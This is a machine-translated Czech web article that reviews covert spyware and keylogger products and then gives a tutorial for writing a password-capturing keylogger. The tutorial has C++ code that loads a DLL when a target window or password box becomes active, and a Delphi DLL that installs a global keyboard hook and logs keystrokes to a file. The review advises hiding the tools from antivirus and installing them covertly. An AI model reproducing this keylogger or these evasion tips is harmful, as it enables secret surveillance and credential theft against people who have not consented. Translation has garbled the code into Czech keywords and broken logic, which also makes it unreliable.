    Díky ruskojazyčnému rozhraní, široké škále funkcí, správnému zachycení klávesnice a zcela skrytému režimu provozu v systému získává NeoSpy při výběru maximální hodnocení uživatelský ovládací software.

    Skutečný špionážní monitor

    Dalším špionem je Real Spy Monitor. Tento program v angličtině má nejen funkce sledování, ale může také blokovat určité akce v počítači. Proto se často používá jako prostředek rodičovské kontroly.

    Pro každého účet v nastavení Real Spy Monitor si můžete vytvořit vlastní politiku zákazů, například pro návštěvu určitých stránek.

    Bohužel kvůli chybějícímu rozhraní v angličtině je obtížnější zjistit, jak Real Spy Monitor funguje, a to i přes grafické miniatury tlačítek.

    Program je také placený. Licence stojí od 39,95 $.

    Vlastnosti Real Spy Monitor:

    • zachycení stisku kláves, obsahu schránky, systémových událostí, webových stránek, instant messengerů, pošty;
    • pracovat v poloskrytém režimu (bez aktivního okna, ale se zobrazením procesu ve správci úloh);
    • pracovat s více účty;
    • selektivní autostart pro různé účty.

    Obecně platí, že mnoho uživatelů má rádo Real Spy Monitor, mezi nedostatky, které zaznamenali vysoká cena, absence rozhraní v ruštině a zobrazení procesu ve správci úloh.

    Skutečný špión

    Vývojáři staví Actual Spy jako keylogger ( keylogger), i když program umí více než jen zaznamenávat stisknuté klávesy.

    Ovládá obsah schránky, pořizuje snímky obrazovky, sleduje návštěvy webových stránek a další věci, které jsou součástí hlavní sady špionů, které jsme zkontrolovali.

    Po instalaci vytvoří Actual Spy zástupce v nabídce Start, takže jej uživatel uvidí. Spuštění také probíhá otevřeně - pro skrytí okna programu musíte stisknout určité klávesy.

    Příležitosti Aktuální Spy se příliš neliší od schopností konkurentů. Mezi nedostatky uživatelé poznamenali, že správně zaznamenává úhozy pouze v anglickém rozložení.

    Spy Go

    SpyGo je špionážní sada pro domácí použití. Lze jej použít i v kancelářích pro kontrolu zaměstnanců.

    Chcete-li zahájit monitorování, stačí kliknout na tlačítko "Start" ve SpyGo.

    SpyGo je distribuován pod sharewarovou licencí a stojí 990-2990 rublů v závislosti na sadě funkcí.

    V zkušební verze doba sledování je omezena na 20 minut denně a odesílání zpráv na e-mailem a přes FTP.

    Hlavní vlastnosti SpyGo:

    • monitorování stisku kláves;
    • záznam všech akcí v počítači (spouštění programů, operace se soubory atd.);
    • kontrola návštěv webových zdrojů (historie, vyhledávací dotazy, často navštěvované stránky, délka pobytu na stránce);
    • záznam toho, co se děje na obrazovce;
    • uložení obsahu schránky;
    • poslech okolí (pokud máte mikrofon);
    • sledování systémových událostí (čas do zapnutí a vypnutí počítače, prostoje, připojení flash disků, disků atd.).

    Důležité! Mezi nevýhody SpyGo podle uživatelů patří skutečnost, že nepodporuje všechny Verze Windows, při odesílání reportů často hází chyby a jde celkem snadno odmaskovat.

    práskač

    Snitch - název tohoto programu se překládá jako "snitch" a je vůči uživateli velmi nepřátelský. Snitch špehuje činnost počítače. Funguje skrytě, nevyžaduje složité nastavení a má malý vliv na výkon systému.

    Program je vydán v jediné verzi.

    Vlastnosti a vlastnosti Snitch:

    • monitorování klávesnice, schránky, systémových událostí, procházení webu a komunikace v instant messengerech;
    • sestavování souhrnných zpráv a harmonogramů řízených akcí;
    • nenáročné na konfiguraci sítě;
    • ochrana před neoprávněným ukončením procesu programu;
    • monitorování se provádí i bez přístupu k síti.

    Z nedostatků si můžete všimnout konfliktů s antiviry

    Jak odhalit špiona na počítači?

    Najít spyware na počítači, který se nijak neprojevuje, je obtížné, ale možné.

    Takže i přes legitimitu, aplikace, které jsme zvážili dokáže rozpoznat speciální antiviry,"naostřeno" pro vyhledávání spywaru (trojské koně s funkcí špionáže), proto doporučujeme přidat nainstalovaný program do seznamu vyloučených takových antivirů.

    A pokud špióna nepotřebujete odstranit, ale potřebujete před ním pouze maskovat své činy, můžete použít antispywarové nástroje, které i přes aktivní špehování zabrání zachycení událostí klávesnice a snímků obrazovky.

    Pak se vaše korespondence a hesla nedostanou do nepovolaných rukou.

    Spyware

    Existovat různé druhy spyware: keyloggery, snímky obrazovky, geolokátory, sběrače informací, internetoví špióni a další. Nějaký univerzální programy kombinuje několik funkcí, což usnadňuje zpracování informací. Existují také specifičtější programy zaměřené na realizaci specifičtějších cílů: audio, video sledování skryté povahy, uhodnutí hesla k WiFi sítě, fotografujte z webové kamery svého zařízení, poslouchejte konverzace v oblíbené programy(Skype, Zello atd.), záloha veškeré informace z přenosných médií uživatele, ukládání informací z USB disků a mnoho dalších. Zvažte nejoblíbenější z těchto programů.

    RealSpyMonitor

    Spyware může nejen sledovat, ale také blokovat přístup uživatelů k programům a webům. Filtry lze konfigurovat jak podle adresy webu, tak podle jednotlivých požadavků (například zablokovat přístup na všechny weby slovem „porno“ na vašem domácí počítač). K dispozici je také možnost přístupu pouze na povolené stránky a blokování přístupu k jiným internetovým zdrojům.



    Rozhraní Realspy není rusifikované


    Tento program má však i některé nevýhody. Jednou z nevýhod je, že program vůbec neumí pracovat s ruskojazyčnými operačními systémy. Při odstraňování úhozů se do souborů protokolu místo ruských znaků zapisují hieroglyfy. To je pochopitelné, protože program není rusifikován. Druhou nevýhodou jsou vysoké náklady na program, což je také důležité.

    práskač

    Tento program se od podobných příliš neliší dálkové ovládání a administrace, ale stále je tu jeden podstatný rozdíl: funguje ve „skrytém“ režimu. Všechny informace shromážděné programem jsou okamžitě odesílány přes internet. Tento program je velmi výhodné použít pro vzdálený dohled nad vaším počítačem nebo počítači vaší společnosti, které mohou být umístěny jak v kanceláři, tak u zaměstnanců, kteří pracují na dálku doma. Program má možnost skryté instalace, která může pomoci při jeho instalaci na vzdálené počítače. Funkce programu je, že i když uživatel nemá internet, program stále shromažďuje informace a odesílá je okamžitě po připojení k internetu.



    Rozhraní Snitch


    Program sleduje všechny stisky kláves, kliknutí myší, navštívené stránky, používané programy a také otevřené a upravované soubory. Všechny informace jsou systematizovány a poskytovány v pohodlné formě: je možné vytvářet grafy a zprávy. Můžete zjistit čas strávený v každém programu, počet hodin strávených na sociálních sítích nebo hrách. A sledování operací se soubory vám umožní sledovat bezpečnost servisních informací. Existují však také významné nevýhody: po instalaci řídicího modulu je velmi obtížné jej vypnout, protože. je ukrytá hluboko v systému. Vznikají stejné problémy a v případě potřeby jej odstraňte. Absence doladění sledování pro každý počítač zvlášť je velmi nepohodlné, protože není potřeba shromažďovat všechny informace o některých uživatelích.

    Stáhnout Snitch

    mocenský špión

    Program je téměř úplným analogem Snitche, liší se pouze v některých prvcích. Na rozdíl od výše popsaného programu má možnost nahrávat zprávy do FTP server nebo odesílání poštou a funguje v absolutně skrytém režimu. Administrátorskou část programu zavoláte pouze přednastavenou klávesovou zkratkou.

    MaxartQuickEye

    Program, který vám umožní sbírat detailní informace o činnostech prováděných na počítači. Bude to velká pomoc šéfovi, který stojí před nelehkou volbou ohledně propouštění zaměstnanců. Analýzou zpráv založených na informacích shromážděných programem je snadné sledovat čas strávený každým zaměstnancem. Navíc budou zohledněna skutečná data, nikoli pouze doba, během níž byl ten či onen program otevřen. Dokonce pracovní program byla otevřena celý den, ale celou tuto dobu uživatel strávil v v sociálních sítích, nebo hraním her, pak se to vše projeví v přehledech. Na základě shromážděných informací získáte skutečné množství pracovního času, který zaměstnanci věnují práci, a to nejen čas strávený u počítače, plýtvání kalhotami.


    Harmonogram pracovní doby


    Kromě funkce shromažďování informací dokáže program vytvořit seznam povolených a zakázaných programů pro každého uživatele a časově omezit provoz programů.

    MipkoEmployeeMonitor

    EliteKeylogger

    Podle tvůrců programu EliteKeylogger snadno spolupracuje s mnoha antiviry. To je velmi výhodné, protože téměř všechny antiviry definují spyware jako „potenciálně nebezpečný“. Důležitou výhodou programu je navíc to, že pracuje na nízké úrovni jádra v systému a nijak nesnižuje jeho výkon. Program, na rozdíl od jiných keyloggerů, má širší arzenál: existují funkce pro sledování souborů odeslaných k tisku; programy, se kterými uživatel pracuje; sledování poštovní korespondence uživatele; ukládání korespondence v nejoblíbenějších instant messengerech (ICQ, Jabber, MSN, AOL, AIM). Neméně důležitou vlastností programu je práce s uživatelskými účty operačního systému, která umožňuje sledovat každého uživatele zvlášť.



    Elitní keylogger


    Program může odeslat přijaté informace poštou, zkopírovat je do složky v lokální síť nebo nahrát na FTP server. Zprávy se ukládají po dobu určenou v programu nebo dokud soubor nedosáhne zadané velikosti. Z nedostatků: časté problémy s instalací na operačních sálech Systémy Windows 7 a 8. Po instalaci programu ovladače někdy havarují různá zařízení, také některé antiviry blokují program.

    ActualSpy 2.8

    Program, který se neliší od mnoha jiných spywarových programů. Shromažďuje data o uživateli a jeho systému, organizuje a odesílá informace uživateli přes lokální síť nebo na vzdálený server. Čas od času jsou problémy s antiviry, zejména s Kaspersky.

    Závěr

    Všechny výše uvedené programy pomáhají uživateli provádět určité úkoly monitorování počítače. Některé jsou širšího záběru, některé jsou více specializované. Hlavní věcí je určit úkoly, které vám byly přiděleny, a vybrat potřebný program. Program NeoSpy poskytuje všechny potřebné moduly pro sledování provozu počítače, až po pořizování snímků z webové kamery a geografické sledování počítače, na kterém je program nainstalován. Sledování internetového provozu vám pomůže sledovat stránky, které vaše dítě navštěvuje a na které vstoupí vyhledávací dotazy. A sestavy zobrazené na počítači nebo přes internet vám pomohou rychle získat potřebné informace ve formě, která vám vyhovuje. Za povšimnutí stojí i Mipko Employee Monitor, který signalizuje zadaná slova ze seznamu a signalizuje o nich správci systému. Dalším programem je Maxart Quick Eye, který dokáže akce uživatele nejen sledovat, ale i zakazovat. Můžete vytvářet černé a bílé seznamy programů. Záležitost zůstává malá - vybrat si požadovaný program a nainstalovat. A váš počítač bude pod kontrolou.

    O psaní keyloggerů
    Už to bylo řečeno mnohokrát, ale všechny
    mají jednu velkou nevýhodu - zpravidla
    nutné znát velmi omezené
    informace a nezapisovat vše do souboru protokolu,
    to, co uživatel píše na klávesnici, je pro vás nepravděpodobné
    dá hodně podnětů k přemýšlení
    mačkání tlačítek při hraní CS 😉

    Z toho vyplývá, že špión musí být
    pokročilé, a ne hloupě zapisovat do logu vše, co
    dávají mu 🙂 I pojmenujte takový program
    špión neotáčí jazykem - je to skoro
    elektronický agent 007:-))) Způsoby, jak
    takže program zapíše do logu zájmu
    nás materiál hodně. Nejjednodušší -
    ovládat aktivní okna, tzn. ve kterém
    tlačítka se momentálně dusí 🙂 Jak se máš,
    Myslím, že špioni se obvykle skládají z
    spustitelný soubor a DLL. To je způsobeno skutečností
    co zachytit zprávy do okna
    nutné vytvořit nový PROCES a většina
    vhodné k tomu je použít dll-ku.
    Proto, aby se aktivoval
    vlastně samotný logger, bude potřeba v právu
    okamžik načtení DLL a kdy aktivní okno
    se změní na něco jiného - uvolněte jej z paměti.

    Zvažte funkce práce s DLL v jazyce Visual
    C++. Provede se načtení do paměti dll
    funkce hINSTAGE=LoadLibrary("name.dll"), kde je hINSTAGE
    jako popisovač knihovny DLL načtené do paměti,
    name.dll je název knihovny. Abych to vyložil
    existuje funkce FreeLibrary(hINSTAGE);

    Nyní o tom, jak můžeme potřebovat
    aplikací. Například víme, že uživatel
    čte poštu prostřednictvím webu www.mail.ru, pak můžete
    nakonfigurujte agenta k zachycení
    stisknutí kláves, když uživatel toto zadá
    webová stránka. (Upozorňujeme, že některé
    Špionážní aplikace s klávesnicí ne
    může fungovat například v adresním řádku
    Internet Explorer – to vede k „havárii
    dokončení programů“ - a z čeho jste ještě
    Windows chtěl :))) Pro tuto metodu je to docela
    Vhodné je i čtení hesel z „dialeru“.
    - pokud uživatel trpí paranoiou a pokaždé
    zadá login a pass ručně 🙂 Nebo opravdu
    je zajímavé vědět, co píše v Outlooku popř
    v poznámkovém bloku. Zde je část kódu, která to dělá
    srovnání titulků oken s potřebnými pro nás.

    HINSTAGE hINSTAGE;

    zatímco (1)
    {
    //Spusťte smyčku.

    int sl,ll;
    11=1;
    sl=2;
    //proměnné pro
    čelit    A.
    charst;
    HWND hw;
    // Jdeme na to nejjednodušší
    by - porovnat řetězce znak po znaku:
    výsledný titulek okna a s požadovaným
    tětiva.

    zatímco (ll!=sl)
    {

    hw=GetForegroundWindow();
    GetWindowText(hw,st,128); // číst

    char stt="_Sem napíšeme název požadovaného
    nám windows_#1";

    sl=strlen(stt);
    11=0;
    zatímco (stt==st)
    // porovnej
    znak po znakovém řetězci
    // je pohodlnější to udělat z pozice, která bude
    zkontrolujte, zda je to nutné
    // můžeme použít řetězec jako součást jiného řetězce
    aby to vypadalo jako //široký filtr.
    {
    ll++;
    }

    if (ll==sl) ( //pokud řetězce
    zápas až do konce 1. řady -
    Stůj; // přeruší proces
    }
    // a tak dále - pokud
    je třeba zkontrolovat více oken.
    char stt="_Sem napíšeme název požadovaného
    nám windows_#2";
    sl=strlen(stt);
    11=0;
    zatímco (stt==st)
    {
    ll++;
    }

    if (ll==sl) (
    Stůj; // přeruší proces
    }

    Místo sekvenční kontroly můžete
    udělat paralelní při srovnání v
    řádkové prvky v jednom cyklu, pokud je alespoň jeden
    spárované - pak se aktivuje DLL-spy.

    hINSTAGE=LoadLibrary("key1.dll");

    Nyní musíme neustále kontrolovat
    zda okno zůstane aktivní.

    zatímco (ll==sl) //Sbohem
    čáry jsou stejné - točí se na místě
    {
    hw=GetForegroundWindow();
    GetWindowText(hw,st,128);    // číst
    aktuálně aktivní okno.
    11=0;
    zatímco (stt==st)
    {
    ll++;
    }
    }

    Výstup ze smyčky znamená, že je aktivní
    okno se změnilo, takže pak stáhneme "spyware"
    knihovna a smyčka začíná od začátku - tzn.
    program opět čeká na jeden z
    požadovaná okna.

    FreeLibrary(hINSTAGE);

    Nicméně, výše uvedený způsob také
    nevýhody - je třeba pokaždé zkontrolovat
    z celého seznamu oken je požadovaný
    jsme momentálně aktivní. Proto
    můžete použít jiný algoritmus - zaškrtněte ne
    název okna a podívejte se, zda v daném
    prvky okna typu EditBox. Obvykle,
    hesla jsou tam napsaná přesně 🙂 Na tohle bude
    podívejte se na prvky tohoto okna - a pokud
    mezi nimi je Edit - pak načteme DLL.

    char p2,p3; //pole
    znaky pro nadpisy oken.

    Opět ve smyčce kontrolujeme všechna okna:

    while (p3!="Edit") //Sbohem
    nenalezli okno s editboxem - provedeme cyklus
    {

    hw=GetForegroundWindow();

    HWND hwnd_child; //proměnná
    okenní prvek

    hwnd_child = GetWindow(hw,GW_CHILD);
    GetClassName(hwnd_child,p3,128);
    if (p3!="Edit")
    // pokud první z
    nalezené prvky okna - ne EditBox - pak
    hledat dál
    {
    while (hwnd_child!=0)
    {
    hwnd_child = GetWindow(hwnd_child, GW_HWNDNEXT);

    GetClassName(hwnd_child,p3,128);
    if (p3=="Upravit")
    {
    Stůj;
    }
    }
    }
    }

    Nyní o samotné spywarové knihovně DLL.
    Je lepší to napsat v Delphi, protože toto
    zralý potomek Pascala takový nemá
    zvrácený "Hubby" zvyk
    hnidopišství o datových typech. Vytvořit
    vyberte knihovnu File-New-Direct Link Library - a
    příprava pro DLL je připravena. A zde je samotný kód:

    klíč knihovny1;
    používá Windows;

    var
    KHook: HHOOK; // proměnná pro
    "pasti"

    funkce KProc(Kód: celé číslo; wParam: Word; lParam: LongInt): LongInt; stdcall;
    konst
    KState: celé číslo = 1073741824; //kód
    "stisknuta klávesa"

    var
    Simv: ShortString;
    KL: pole Char; //Pro
    kontrola rozložení klávesnice
    FStruktura: TOFSTRUCT;
    F: TextFile;    //proměnná
    log soubor.

    začít

    // odfiltrovat zbytečné
    zprávy
    if (lParam a KState)<>0 pak
    začít

    výstup;
    konec;

    AssignFile(F, 'keylog.txt');

    // pokuste se otevřít
    soubor 'keylog.txt':
    if OpenFile(PChar('keylog.txt'), FStruct, OF_EXIST) = HFILE_ERROR pak
    začít
    ReWrite(F);    // pokud soubor není
    vytvořil - vytvořit.
    konec
    else Append(F);
    // pokud existuje, napište
    konec.

    Simv:=chr(0); //nastaveno na nulu
    proměnná symbolu načtená z klávesnice.

    // analyzovat kód
    stisknutá klávesa
    případ wParam of
    // čísla
    48..57: Simv:=Chr(wParam);
    96: Simv:='0';
    97: Simv:='1';

    104: Simv:='8';
    105: Simv:='9';
    189,109: Simv:='-';
    110: Simv:='.';
    111: Simv:='/';
    konec;

    GetKeyboardLayoutName(KL); //
    kontrola rozložení
    pokud KL = '00000409', pak    // Pokud
    latinský:
    začít
    případ wParam of
    219: Simv:="[';
    221: Simv:=']';
    186: Simv:=';';
    222: Simv:='"';
    188: Simv:=',';
    190: Simv:='.';
    191: Simv:='/';
    65..90: Simv:=Chr(wParam);
    konec;
    konec;
    konec;
    pokud KL = '00000419', pak    // Pokud
    ruština
    začít
    případ wParam of
    219: Simv:='X';
    221: Simv:='Ъ';
    186: Simv:='W';
    222: Simv:='E';
    188: Simv:='B';
    190: Simv:='Yu';
    191: Simv:='.';
    65: Simv:='F';

    87: Simv:='C';
    88: Simv:='H';
    89: Simv:='H';
    90: Simv:='Já';
    konec;

    //pokud znak není prázdný (tj.
    pokud bylo stisknuto alfanumerické tlačítko)
    //pak to zapiš do souboru
    pokud Simv<>" pak
    Write(F, Simv);
    // zavřete soubor
    CloseFile(F);

    // poslat zprávu
    další pasti v systému
    Result:=CallNextHookEx(KHook, kód, wParam, lParam);
    konec;

    začít
    //Nastav past
    k zachycení zpráv o klávesnici.
    KHook:=SetWindowsHookEx(WH_KEYBOARD, @KProc, HIinstance, 0);

    Tento program lze také zjednodušit
    v závislosti na oblasti použití - pokud
    řekněme, že stačí počítat jednou
    heslo z dialeru - pak můžete dát
    kontrolujeme okna, dokud to nebudeme potřebovat a kdy to bude
    se stane aktivním - načte knihovnu
    key1.dll, počkejte určitou dobu
    do kterého bude mít uživatel čas tyto znaky zadat
    klávesnici a poté vyjměte knihovnu a
    ukončit program. Něco takového 🙂

    hINSTAGE=LoadLibrary("key1.dll");
    Spánek(10000);
    //počkejte na to 10 sekund
    čas, kdy uživatel zadá heslo.
    //čas může být zvýšen v závislosti
    na míře uživatelské inhibice
    // a jeho rychlost psaní na klávesnici 🙂
    FreeLibrary(hINSTAGE);

    PS: Všechny výše uvedené materiály byly uvedeny
    výhradně s demo a
    obecné vzdělávací cíle, autor vytyčil
    výzva k demonstraci
    algoritmus typu programu "upgraded
    keylogger“ a vše ostatní
    odpovědnost za použití tohoto
    materiál na vás padá (zlomení
    zátěž 🙂) Při implementaci kódu existují
    drobné nepřesnosti, které nepoškozují skutečnost
    algoritmus - zkuste je najít sami)).

    PSS: Keylogger samozřejmě umí nejen
    plnit svou hlavní funkci
    skutečně zapisovat do protokolu stisknutí tlačítka, ale také
    změňte hodnoty stisknutých kláves podle svého
    chuť - ale jak na to a k čemu to je
    může být prostě životně důležité
    příště 🙂